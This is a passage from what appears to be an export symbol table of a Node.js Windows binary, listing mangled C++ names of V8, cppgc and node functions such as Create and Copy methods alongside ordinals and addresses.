                                                                                                                                                                                                                                    ?CopyTableEntries@WasmInstanceObject@internal@v8@@SA_NPEAVIsolate@23@V?$Handle@VWasmInstanceObject@internal@v8@@@23@IIIII@Z47690x140623bd0
                                                                                                                                                                                                                                    ?CopyTo@FixedArray@internal@v8@@QEBAXHV123@HH@Z47700x14090adb0
                                                                                                                                                                                                                                    ?CopyToHeap@ByteData@PreparseDataBuilder@internal@v8@@QEAA?AV?$Handle@VPreparseData@internal@v8@@@34@PEAVIsolate@34@H@Z47710x1408b6630
                                                                                                                                                                                                                                    ?CopyToLocalHeap@ByteData@PreparseDataBuilder@internal@v8@@QEAA?AV?$Handle@VPreparseData@internal@v8@@@34@PEAVLocalIsolate@34@H@Z47720x1408b6680
                                                                                                                                                                                                                                    ?CopyToZone@ByteData@PreparseDataBuilder@internal@v8@@QEAAPEAVZonePreparseData@34@PEAVZone@34@H@Z47730x1408b66d0
                                                                                                                                                                                                                                    ?CopyTracedReference@GlobalHandles@internal@v8@@SAXPEBQEB_KPEAPEA_K@Z47740x140b4c440
                                                                                                                                                                                                                                    ?CopyTracedReference@internal@v8@@YAXPEBQEB_KPEAPEA_K@Z47750x140c7e8d0
                                                                                                                                                                                                                                    ?CopyWasmMemory@BackingStore@internal@v8@@QEAA?AV?$unique_ptr@VBackingStore@internal@v8@@U?$default_delete@VBackingStore@internal@v8@@@std@@@std@@PEAVIsolate@23@_K1@Z47760x140a06880
                                                                                                                                                                                                                                    ?CopyWeakArrayListAndGrow@Factory@internal@v8@@QEAA?AV?$Handle@VWeakArrayList@internal@v8@@@23@V423@HW4AllocationType@23@@Z47770x140b23330
                                                                                                                                                                                                                                    ?CopyWeakFixedArrayAndGrow@Factory@internal@v8@@QEAA?AV?$Handle@VWeakFixedArray@internal@v8@@@23@V423@H@Z47780x140b23420
                                                                                                                                                                                                                                    ?CopyWithConstant@Map@internal@v8@@SA?AV?$MaybeHandle@VMap@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VMap@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@W4PropertyAttributes@23@W4TransitionFlag@23@@Z47790x140927880
                                                                                                                                                                                                                                    ?CopyWithField@Map@internal@v8@@SA?AV?$MaybeHandle@VMap@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VMap@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@V?$Handle@VFieldType@internal@v8@@@23@W4PropertyAttributes@23@W4PropertyConstness@23@VRepresentation@23@W4TransitionFlag@23@@Z47800x1409279c0
                                                                                                                                                                                                                                    ?Count@BitVector@internal@v8@@QEBAHXZ47810x1407bc2d0
                                                                                                                                                                                                                                    ?Count@BlockData@Coverage@debug@v8@@QEBAIXZ47820x14057f4f0
                                                                                                                                                                                                                                    ?Count@FunctionData@Coverage@debug@v8@@QEBAIXZ47830x14057f4f0
                                                                                                                                                                                                                                    ?CountTotalPages@PagedSpace@internal@v8@@QEBAHXZ47840x140aac6e0
                                                                                                                                                                                                                                    ?CountUsage@Isolate@internal@v8@@QEAAXW4UseCounterFeature@13@@Z47850x140b67190
                                                                                                                                                                                                                                    ?CountUsage@Isolate@internal@v8@@QEAAXW4UseCounterFeature@13@H@Z47860x140b67230
                                                                                                                                                                                                                                    ?CountUsage@Parser@internal@v8@@AEAAXW4UseCounterFeature@Isolate@3@@Z47870x14088e280
                                                                                                                                                                                                                                    ?Covers@LiveRange@compiler@internal@v8@@QEBA_NVLifetimePosition@234@@Z47880x14110d0e0
                                                                                                                                                                                                                                    ?Create@ArrayBufferAllocator@node@@SA?AV?$unique_ptr@VArrayBufferAllocator@node@@U?$default_delete@VArrayBufferAllocator@node@@@std@@@std@@_N@Z47890x14029da60
                                                                                                                                                                                                                                    ?Create@CppHeap@v8@@SA?AV?$unique_ptr@VCppHeap@v8@@U?$default_delete@VCppHeap@v8@@@std@@@std@@PEAVPlatform@2@AEBUCppHeapCreateParams@2@@Z47900x140b3f190
                                                                                                                                                                                                                                    ?Create@EternalHandles@internal@v8@@QEAAXPEAVIsolate@23@VObject@23@PEAH@Z47910x140b4c4d0
                                                                                                                                                                                                                                    ?Create@ExternalReference@internal@v8@@SA?AV123@PEAVApiFunction@3@W4Type@123@@Z47920x140097a90
                                                                                                                                                                                                                                    ?Create@ExternalReference@internal@v8@@SA?AV123@PEAVIsolate@23@PEAVApiFunction@3@W4Type@123@PEA_KPEBQEBVCFunctionInfo@3@I@Z47930x140bfae80
                                                                                                                                                                                                                                    ?Create@ExternalReference@internal@v8@@SA?AV123@_KW4Type@123@@Z47940x140097ad0
                                                                                                                                                                                                                                    ?Create@GlobalHandles@internal@v8@@QEAA?AV?$Handle@VObject@internal@v8@@@23@VObject@23@@Z47950x140b4c5d0
                                                                                                                                                                                                                                    ?Create@GlobalHandles@internal@v8@@QEAA?AV?$Handle@VObject@internal@v8@@@23@_K@Z47960x140b4c770
                                                                                                                                                                                                                                    ?Create@Heap@cppgc@@SA?AV?$unique_ptr@VHeap@cppgc@@U?$default_delete@VHeap@cppgc@@@std@@@std@@V?$shared_ptr@VPlatform@cppgc@@@4@UHeapOptions@12@@Z47970x140517850
                                                                                                                                                                                                                                    ?Create@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ47980x14103d0c0
                                                                                                                                                                                                                                    ?Create@LargePage@internal@cppgc@@SAPEAV123@AEAVPageBackend@23@AEAVLargePageSpace@23@_K@Z47990x14051a160
                                                                                                                                                                                                                                    ?Create@LivenessBrokerFactory@internal@cppgc@@SA?AVLivenessBroker@3@XZ48000x140517170
                                                                                                                                                                                                                                    ?Create@Map@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@PEAVIsolate@23@H@Z48010x140927c90
                                                                                                                                                                                                                                    ?Create@MultiIsolatePlatform@node@@SA?AV?$unique_ptr@VMultiIsolatePlatform@node@@U?$default_delete@VMultiIsolatePlatform@node@@@std@@@std@@HPEAVTracingController@v8@@PEAVPageAllocator@6@@Z48020x14029dbb0
                                                                                                                                                                                                                                    ?Create@NormalPage@internal@cppgc@@SAPEAV123@AEAVPageBackend@23@AEAVNormalPageSpace@23@@Z48030x14051a1d0
                                                                                                                                                                                                                                    ?Create@PropertyIterator@debug@v8@@SA?AV?$unique_ptr@VPropertyIterator@debug@v8@@U?$default_delete@VPropertyIterator@debug@v8@@@std@@@std@@V?$Local@VContext@v8@@@3@V?$Local@VObject@v8@@@3@_N@Z48040x140bc9340
                                                                                                                                                                                                                                    ?Create@StackTraceIterator@debug@v8@@SA?AV?$unique_ptr@VStackTraceIterator@debug@v8@@U?$default_delete@VStackTraceIterator@debug@v8@@@std@@@std@@PEAVIsolate@3@H@Z48050x140bc25d0
                                                                                                                                                                                                                                    ?Create@TracedValue@tracing@v8@@SA?AV?$unique_ptr@VTracedValue@tracing@v8@@U?$default_delete@VTracedValue@tracing@v8@@@std@@@std@@XZ48060x1407be170
                                                                                                                                                                                                                                    ?CreateAddressSpaceReservation@OS@base@v8@@CA?AV?$Optional@VAddressSpaceReservation@base@v8@@@23@PEAX_K1W4MemoryPermission@123@@Z48070x140ff3890
                                                                                                                                                                                                                                    ?CreateAndSetEmbeddedBlob@Isolate@internal@v8@@AEAAXXZ48080x140b67300
                                                                                                                                                                                                                                    ?CreateArguments@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@W4CreateArgumentsType@34@@Z48090x140a5c410
                                                                                                                                                                                                                                    ?CreateArguments@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4CreateArgumentsType@34@@Z48100x1410c31f0
                                                                                                                                                                                                                                    ?CreateArray@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@_KV?$Optional@VAllocationSiteRef@compiler@internal@v8@@@base@4@@Z48110x1410c32b0
                                                                                                                                                                                                                                    ?CreateArrayBufferAllocator@node@@YAPEAVArrayBufferAllocator@1@XZ48120x14029dc20
                                                                                                                                                                                                                                    ?CreateArrayFromIterable@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@XZ48130x140a5c650
                                                                                                                                                                                                                                    ?CreateArrayFromIterable@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ48140x1410c33b0
                                                                                                                                                                                                                                    ?CreateArrayIterator@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4IterationKind@34@@Z48150x1410c3440
                                                                                                                                                                                                                                    ?CreateArrayLiteral@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@_KHH@Z48160x140a5c770
                                                                                                                                                                                                                                    ?CreateArrayOfSize@FeedbackNexus@internal@v8@@AEAA?AV?$Handle@VWeakFixedArray@internal@v8@@@23@H@Z48170x1409aa860
                                                                                                                                                                                                                                    ?CreateAsyncCompileJob@WasmEngine@wasm@internal@v8@@AEAAPEAVAsyncCompileJob@234@PEAVIsolate@34@AEBVWasmFeatures@234@V?$unique_ptr@$$BY0A@EU?$default_delete@$$BY0A@E@std@@@std@@_KV?$Handle@VContext@internal@v8@@@34@PEBDV?$shared_ptr@VCompilationResultResolver@wasm@internal@v8@@@9@H@Z48180x14064b4b0
                                                                                                                                                                                                                                    ?CreateAsyncFunctionObject@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@H@Z48190x1410c3500
                                                                                                                                                                                                                                    ?CreateAsyncStreamingDecoder@StreamingDecoder@wasm@internal@v8@@SA?AV?$unique_ptr@VStreamingDecoder@wasm@internal@v8@@U?$default_delete@VStreamingDecoder@wasm@internal@v8@@@std@@@std@@V?$unique_ptr@VStreamingProcessor@wasm@internal@v8@@U?$default_delete@VStreamingProcessor@wasm@internal@v8@@@std@@@6@@Z48200x140668530
                                                                                                                                                                                                                                    ?CreateBlackArea@Page@internal@v8@@QEAAX_K0@Z48210x140a9c050
                                                                                                                                                                                                                                    ?CreateBlackAreaBackground@Page@internal@v8@@QEAAX_K0@Z48220x140a9c0a0
                                                                                                                                                                                                                                    ?CreateBlob@SnapshotCreator@v8@@QEAA?AVStartupData@2@W4FunctionCodeHandling@12@@Z48230x140c7e8e0
                                                                                                                                                                                                                                    ?CreateBlockContext@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@PEBVScope@34@@Z48240x140a5c910
                                                                                                                                                                                                                                    ?CreateBlockContext@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBVScopeInfoRef@234@@Z48250x1410c35c0
                                                                                                                                                                                                                                    ?CreateBoundFunction@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@_KAEBVMapRef@234@@Z48260x1410c3680
                                                                                                                                                                                                                                    ?CreateBreakInfo@Debug@internal@v8@@QEAAXV?$Handle@VSharedFunctionInfo@internal@v8@@@23@@Z48270x140bb8de0
                                                                                                                                                                                                                                    ?CreateCanonicalEmptySwissNameDictionary@Factory@internal@v8@@QEAA?AV?$Handle@VSwissNameDictionary@internal@v8@@@23@XZ48280x140b23550
                                                                                                                                                                                                                                    ?CreateCatchContext@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@PEBVScope@34@@Z48290x140a5ca60
                                                                                                                                                                                                                                    ?CreateCatchContext@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBVScopeInfoRef@234@@Z48300x1410c3750
                                                                                                                                                                                                                                    ?CreateClassFunctionMap@Factory@internal@v8@@QEAA?AV?$Handle@VMap@internal@v8@@@23@V?$Handle@VJSFunction@internal@v8@@@23@@Z48310x140b23620
                                                                                                                                                                                                                                    ?CreateClosure@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@_KHH@Z48320x140a5cc20
                                                                                                                                                                                                                                    ?CreateClosure@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBVSharedFunctionInfoRef@234@AEBVCodeRef@234@W4AllocationType@34@@Z48330x1410c3810
                                                                                                                                                                                                                                    ?CreateClosureFromBuiltinSharedFunctionInfo@JSCallReducer@compiler@internal@v8@@AEAAPEAVNode@234@VSharedFunctionInfoRef@234@PEAV5234@11@Z48340x141161be0
                                                                                                                                                                                                                                    ?CreateCodeCache@ScriptCompiler@v8@@SAPEAUCachedData@12@V?$Local@VUnboundModuleScript@v8@@@2@@Z48350x140c7f400
                                                                                                                                                                                                                                    ?CreateCodeCache@ScriptCompiler@v8@@SAPEAUCachedData@12@V?$Local@VUnboundScript@v8@@@2@@Z48360x140c7f400
                                                                                                                                                                                                                                    ?CreateCodeCacheForFunction@ScriptCompiler@v8@@SAPEAUCachedData@12@V?$Local@VFunction@v8@@@2@@Z48370x140c7f410
                                                                                                                                                                                                                                    ?CreateCollectionIterator@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4CollectionKind@34@W4IterationKind@34@@Z48380x1410c38e0
                                                                                                                                                                                                                                    ?CreateCompilationEnv@NativeModule@wasm@internal@v8@@QEBA?AUCompilationEnv@234@XZ48390x140660090
                                                                                                                                                                                                                                    ?CreateConcurrentMarkingVisitor@ConcurrentMarker@internal@cppgc@@UEBA?AV?$unique_ptr@VVisitor@cppgc@@U?$default_delete@VVisitor@cppgc@@@std@@@std@@AEAVConcurrentMarkingState@23@@Z48400x14051db60
                                                                                                                                                                                                                                    ?CreateContextWorklists@MarkingWorklists@internal@v8@@QEAAXAEBV?$vector@_KV?$allocator@_K@std@@@std@@@Z48410x140abee10
                                                                                                                                                                                                                                    ?CreateCppMarkingState@CppHeap@internal@v8@@QEAA?AV?$unique_ptr@VCppMarkingState@internal@v8@@U?$default_delete@VCppMarkingState@internal@v8@@@std@@@std@@XZ48420x140b3f280
                                                                                                                                                                                                                                    ?CreateCppMarkingStateForMutatorThread@CppHeap@internal@v8@@QEAA?AV?$unique_ptr@VCppMarkingState@internal@v8@@U?$default_delete@VCppMarkingState@internal@v8@@@std@@@std@@XZ48430x140b3f350
                                                                                                                                                                                                                                    ?CreateDataProperty@Object@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@IV?$Local@VValue@v8@@@2@@Z48440x140c7f500
                                                                                                                                                                                                                                    ?CreateDataProperty@Object@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@V?$Local@VName@v8@@@2@V?$Local@VValue@v8@@@2@@Z48450x140c7f770
                                                                                                                                                                                                                                    ?CreateDelayedStringConstant@JSNativeContextSpecialization@compiler@internal@v8@@AEAA?AV?$Optional@PEBVStringConstantBase@internal@v8@@@base@4@PEAVNode@234@@Z48460x1411a19e0
                                                                                                                                                                                                                                    ?CreateEmptyArrayLiteral@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@H@Z48470x140a5cdc0
                                                                                                                                                                                                                                    ?CreateEmptyJumpTableInRegionLocked@NativeModule@wasm@internal@v8@@AEAAPEAVWasmCode@234@HVAddressRegion@base@4@@Z48480x140660140
                                                                                                                                                                                                                                    ?CreateEmptyLiteralArray@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z48490x1410c39c0
                                                                                                                                                                                                                                    ?CreateEmptyLiteralObject@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ48500x1410c3a80
                                                                                                                                                                                                                                    ?CreateEmptyObjectLiteral@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@XZ48510x140a5cf10
                                                                                                                                                                                                                                    ?CreateEntriesForRuntimeCallStats@ProfilerCodeObserver@internal@v8@@AEAAXXZ48520x1400971a0
                                                                                                                                                                                                                                    ?CreateEnvironment@node@@YAPEAVEnvironment@1@PEAVIsolateData@1@V?$Local@VContext@v8@@@v8@@AEBV?$vector@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$allocator@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@std@@2W4Flags@EnvironmentFlags@1@UThreadId@1@V?$unique_ptr@UInspectorParentHandle@node@@U?$default_delete@UInspectorParentHandle@node@@@std@@@7@@Z48530x14029dc60
                                                                                                                                                                                                                                    ?CreateEvalContext@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@PEBVScope@34@H@Z48540x140a5d010
                                                                                                                                                                                                                                    ?CreateFillerObjectAt@Heap@internal@v8@@AEAA?AVHeapObject@23@_KHW4ClearFreedMemoryMode@23@@Z48550x140b02c10
                                                                                                                                                                                                                                    ?CreateFillerObjectAt@Heap@internal@v8@@QEAA?AVHeapObject@23@_KHW4ClearRecordedSlots@23@@Z48560x140b02c40
                                                                                                                                                                                                                                    ?CreateFillerObjectAt@LocalHeap@internal@v8@@QEAAX_KHW4ClearRecordedSlots@23@@Z48570x1407e9e50
                                                                                                                                                                                                                                    ?CreateForEachStatementTDZ@Parser@internal@v8@@AEAAPEAVBlock@23@PEAV423@AEBUForInfo@?$ParserBase@VParser@internal@v8@@@23@@Z48580x1408bac40
                                                                                                                                                                                                                                    ?CreateForEmptyFunction@ScopeInfo@internal@v8@@SA?AV?$Handle@VScopeInfo@internal@v8@@@23@PEAVIsolate@23@@Z48590x1408f16a0
                                                                                                                                                                                                                                    ?CreateForFunction@ScopeIterator@debug@v8@@SA?AV?$unique_ptr@VScopeIterator@debug@v8@@U?$default_delete@VScopeIterator@debug@v8@@@std@@@std@@PEAVIsolate@3@V?$Local@VFunction@v8@@@3@@Z48600x140bc66b0
                                                                                                                                                                                                                                    ?CreateForGeneratorObject@ScopeIterator@debug@v8@@SA?AV?$unique_ptr@VScopeIterator@debug@v8@@U?$default_delete@VScopeIterator@debug@v8@@@std@@@std@@PEAVIsolate@3@V?$Local@VObject@v8@@@3@@Z48610x140bc67a0
                                                                                                                                                                                                                                    ?CreateForWithScope@ScopeInfo@internal@v8@@SA?AV?$Handle@VScopeInfo@internal@v8@@@23@PEAVIsolate@23@V?$MaybeHandle@VScopeInfo@internal@v8@@@23@@Z48620x1408f16c0
                                                                                                                                                                                                                                    ?CreateFrameAccessState@CodeGenerator@compiler@internal@v8@@AEAAXPEAVFrame@234@@Z48630x14106d270
                                                                                                                                                                                                                                    ?CreateFrameStateFunctionInfo@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVFrameStateFunctionInfo@234@W4FrameStateType@234@HHV?$Handle@VSharedFunctionInfo@internal@v8@@@34@@Z48640x141039960
                                                                                                                                                                                                                                    ?CreateFreeList@FreeList@internal@v8@@SAPEAV123@XZ48650x140b1f350
                                                                                                                                                                                                                                    ?CreateFunctionContext@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@PEBVScope@34@H@Z48660x140a5d1a0
                                                                                                                                                                                                                                    ?CreateFunctionContext@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBVScopeInfoRef@234@HW4ScopeType@34@@Z48670x1410c3b10
                                                                                                                                                                                                                                    ?CreateGeneratorObject@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ48680x1410c3bd0
                                                                                                                                                                                                                                    ?CreateHandle@HandleScope@v8@@KAPEA_KPEAVIsolate@internal@2@_K@Z48690x140c7f9f0
                                                                                                                                                                                                                                    ?CreateHistogram@Histogram@internal@v8@@AEBAPEAXXZ48700x140a1d200
                                                                                                                                                                                                                                    ?CreateInitializerFunction@Parser@internal@v8@@AEAAPEAVFunctionLiteral@23@PEBDPEAVDeclarationScope@23@PEAVStatement@23@@Z48710x1408bacf0
                                                                                                                                                                                                                                    ?CreateIsolateData@node@@YAPEAVIsolateData@1@PEAVIsolate@v8@@PEAUuv_loop_s@@PEAVMultiIsolatePlatform@1@PEAVArrayBufferAllocator@1@@Z48720x14029dd80
                                                                                                                                                                                                                                    ?CreateIterResultObject@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ48730x14103d0b0
                                                                                                                                                                                                                                    ?CreateJSFunction@WebSnapshotDeserializer@internal@v8@@AEAA?AV?$Handle@VJSFunction@internal@v8@@@23@HIIIII@Z48740x1407af6c0
                                                                                                                                                                                                                                    ?CreateJSToWasmFrameStateFunctionInfo@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVFrameStateFunctionInfo@234@W4FrameStateType@234@HHV?$Handle@VSharedFunctionInfo@internal@v8@@@34@PEBV?$Signature@VValueType@wasm@internal@v8@@@34@@Z48750x1410399d0
                                                                                                                                                                                                                                    ?CreateKeyValueArray@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ48760x14103b2d0
                                                                                                                                                                                                                                    ?CreateLiteralArray@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBVArrayBoilerplateDescriptionRef@234@AEBUFeedbackSource@234@HH@Z48770x1410c3c60
                                                                                                                                                                                                                                    ?CreateLiteralObject@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBVObjectBoilerplateDescriptionRef@234@AEBUFeedbackSource@234@HH@Z48780x1410c3d40
                                                                                                                                                                                                                                    ?CreateLiteralRegExp@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBVStringRef@234@AEBUFeedbackSource@234@H@Z48790x1410c3e20
                                                                                                                                                                                                                                    ?CreateMaterializedEquivalent@BytecodeRegisterOptimizer@interpreter@internal@v8@@AEAAXPEAVRegisterInfo@1234@@Z48800x140a37da0
                                                                                                                                                                                                                                    ?CreateMessage@Exception@v8@@SA?AV?$Local@VMessage@v8@@@2@PEAVIsolate@2@V?$Local@VValue@v8@@@2@@Z48810x140c7fa30
                                                                                                                                                                                                                                    ?CreateMessage@Isolate@internal@v8@@QEAA?AV?$Handle@VJSMessageObject@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@PEAVMessageLocation@23@@Z48820x140b67680
                                                                                                                                                                                                                                    ?CreateMessageFromException@Isolate@internal@v8@@QEAA?AV?$Handle@VJSMessageObject@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@@Z48830x140b67780
                                                                                                                                                                                                                                    ?CreateMessageFromException@debug@v8@@YA?AV?$Local@VMessage@v8@@@2@PEAVIsolate@2@V?$Local@VValue@v8@@@2@@Z48840x140bc94c0
                                                                                                                                                                                                                                    ?CreateMessageOrAbort@Isolate@internal@v8@@QEAA?AV?$Handle@VJSMessageObject@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@PEAVMessageLocation@23@@Z48850x140b67840
                                                                                                                                                                                                                                    ?CreateNewBuffer@AsyncStreamingDecoder@wasm@internal@v8@@AEAAPEAVSectionBuffer@1234@IE_KV?$Vector@$$CBE@base@4@@Z48860x140668590
                                                                                                                                                                                                                                    ?CreateNodeFromPredecessors@RawMachineAssembler@compiler@internal@v8@@AEAAPEAVNode@234@AEBV?$vector@PEAVBasicBlock@compiler@internal@v8@@V?$allocator@PEAVBasicBlock@compiler@internal@v8@@@std@@@std@@AEBV?$vector@PEAVNode@compiler@internal@v8@@V?$allocator@PEAVNode@compiler@internal@v8@@@std@@@7@PEBVOperator@234@1@Z48870x141218a80
                                                                                                                                                                                                                                    ?CreateObject@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ48880x14103c8d0
                                                                                                                                                                                                                                    ?CreateObjectLiteral@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@_KHH@Z48890x140a5d330
                                                                                                                                                                                                                                    ?CreatePlatform@node@@YAPEAVMultiIsolatePlatform@1@HPEAVTracingController@v8@@@Z48900x14029ddf0
                                                                                                                                                                                                                                    ?CreatePrivateNameVariable@Parser@internal@v8@@AEAAPEAVVariable@23@PEAVClassScope@23@W4VariableMode@23@W4IsStaticFlag@23@PEBVAstRawString@23@@Z48910x1408baef0
                                                                                                                                                                                                                                    ?CreatePromise@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ48920x1410398b0
                                                                                                                                                                                                                                    ?CreateRange@TypeCache@compiler@internal@v8@@AEAA?AVType@234@NN@Z48930x14115a810
                                                                                                                                                                                                                                    ?CreateRegExpLiteral@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@PEBVAstRawString@34@HH@Z48940x140a5d4d0
                                                                                                                                                                                                                                    ?CreateReservedEntry@ConstantArrayBuilder@interpreter@internal@v8@@QEAA?AW4OperandSize@234@XZ48950x140a35110
                                                                                                                                                                                                                                    ?CreateScopeInfo@WebSnapshotDeserializer@internal@v8@@AEAA?AV?$Handle@VScopeInfo@internal@v8@@@23@I_NW4ContextType@WebSnapshotSerializerDeserializer@23@@Z48960x1407afd40
                                                                                                                                                                                                                                    ?CreateSharedMemoryHandleForTesting@OS@base@v8@@SA_J_K@Z48970x140ff3960
                                                                                                                                                                                                                                    ?CreateSloppyFunctionMap@Factory@internal@v8@@QEAA?AV?$Handle@VMap@internal@v8@@@23@W4FunctionMode@23@V?$MaybeHandle@VJSFunction@internal@v8@@@23@@Z48980x140b23820
                                                                                                                                                                                                                                    ?CreateSnapshotDataBlobInternal@internal@v8@@YA?AVStartupData@2@W4FunctionCodeHandling@SnapshotCreator@2@PEBDPEAVIsolate@2@@Z48990x1407d3410
                                                                                                                                                                                                                                    ?CreateStackFrameInfo@FrameSummary@internal@v8@@QEBA?AV?$Handle@VStackFrameInfo@internal@v8@@@23@XZ49000x140b7ac30
                                                                                                                                                                                                                                    ?CreateStrictFunctionMap@Factory@internal@v8@@QEAA?AV?$Handle@VMap@internal@v8@@@23@W4FunctionMode@23@V?$Handle@VJSFunction@internal@v8@@@23@@Z49010x140b23b60
                                                                                                                                                                                                                                    ?CreateStringIterator@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ49020x14103b2c0
                                                                                                                                                                                                                                    ?CreateSubReservation@AddressSpaceReservation@base@v8@@QEAA?AV?$Optional@VAddressSpaceReservation@base@v8@@@23@PEAX_KW4MemoryPermission@OS@23@@Z49030x140ff39a0
                                                                                                                                                                                                                                    ?CreateSyncStreamingDecoder@StreamingDecoder@wasm@internal@v8@@SA?AV?$unique_ptr@VStreamingDecoder@wasm@internal@v8@@U?$default_delete@VStreamingDecoder@wasm@internal@v8@@@std@@@std@@PEAVIsolate@34@AEBVWasmFeatures@234@V?$Handle@VContext@internal@v8@@@34@PEBDV?$shared_ptr@VCompilationResultResolver@wasm@internal@v8@@@6@@Z49040x140667760
                                                                                                                                                                                                                                    ?CreateSyntheticContextVariable@Parser@internal@v8@@AEAAPEAVVariable@23@PEBVAstRawString@23@@Z49050x1408bafd0
                                                                                                                                                                                                                                    ?CreateSyntheticModule@Module@v8@@SA?AV?$Local@VModule@v8@@@2@PEAVIsolate@2@V?$Local@VString@v8@@@2@AEBV?$vector@V?$Local@VString@v8@@@v8@@V?$allocator@V?$Local@VString@v8@@@v8@@@std@@@std@@P6A?AV?$MaybeLocal@VValue@v8@@@2@V?$Local@VContext@v8@@@2@V32@@Z@Z49060x140c7fb50
                                                                                                                                                                                                                                    ?CreateThreadLocalKey@Thread@base@v8@@SAHXZ49070x140ff39c0
                                                                                                                                                                                                                                    ?CreateTimezoneCache@OS@base@v8@@SAPEAVTimezoneCache@23@XZ49080x140ff39d0
                                                                                                                                                                                                                                    ?CreateTraced@GlobalHandles@internal@v8@@QEAA?AV?$Handle@VObject@internal@v8@@@23@VObject@23@PEA_KW4GlobalHandleStoreMode@23@@Z49090x140b4c790
                                                                                                                                                                                                                                    ?CreateTraced@GlobalHandles@internal@v8@@QEAA?AV?$Handle@VObject@internal@v8@@@23@VObject@23@PEA_KW4GlobalHandleStoreMode@23@_N@Z49100x140b4c800
                                                                                                                                                                                                                                    ?CreateTraced@GlobalHandles@internal@v8@@QEAA?AV?$Handle@VObject@internal@v8@@@23@_KPEA_KW4GlobalHandleStoreMode@23@@Z49110x140b4cb70
                                                                                                                                                                                                                                    ?CreateTypedArray@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ49120x14103a610
                                                                                                                                                                                                                                    ?CreateWithContext@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@PEBVScope@34@@Z49130x140a5d660
                                                                                                                                                                                                                                    ?CreateWithContext@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBVScopeInfoRef@234@@Z49140x1410c3f00
                                                                                                                                                                                                                                    ?CreationContext@Object@v8@@QEAA?AV?$Local@VContext@v8@@@2@XZ49150x140c7fd60
                                                                                                                                                                                                                                    ?CreationContext@Object@v8@@SA?AV?$Local@VContext@v8@@@2@AEBV?$PersistentBase@VObject@v8@@@2@@Z49160x140c7fda0
                                                                                                                                                                                                                                    ?CtrlTable@SwissNameDictionary@internal@v8@@AEAAPEACXZ49170x14053eb20
                                                                                                                                                                                                                                    ?CtrlTableSize@SwissNameDictionary@internal@v8@@SAHH@Z49180x14053e2e0
                                                                                                                                                                                                                                    ?CtrlTableStartOffset@SwissNameDictionary@internal@v8@@SAHH@Z49190x14053eb40
                                                                                                                                                                                                                                    ?Current@Isolate@internal@v8@@SAPEAV123@XZ49200x14053eb50
                                                                                                                                                                                                                                    ?Current@LocalHeap@internal@v8@@SAPEAV123@XZ49210x140af1b60
                                                                                                                                                                                                                                    ?Current@SourceLocation@cppgc@@SA?AV12@XZ49220x14009a1b0
                                                                                                                                                                                                                                    ?CurrentAllocationThroughputInBytesPerMillisecond@GCTracer@internal@v8@@QEBANXZ49230x140b1a460
                                                                                                                                                                                                                                    ?CurrentBlock@RawMachineAssembler@compiler@internal@v8@@AEAAPEAVBasicBlock@234@XZ49240x1402d4f40
                                                                                                                                                                                                                                    ?CurrentEmbeddedBlobCode@Isolate@internal@v8@@SAPEBEXZ49250x140b67970
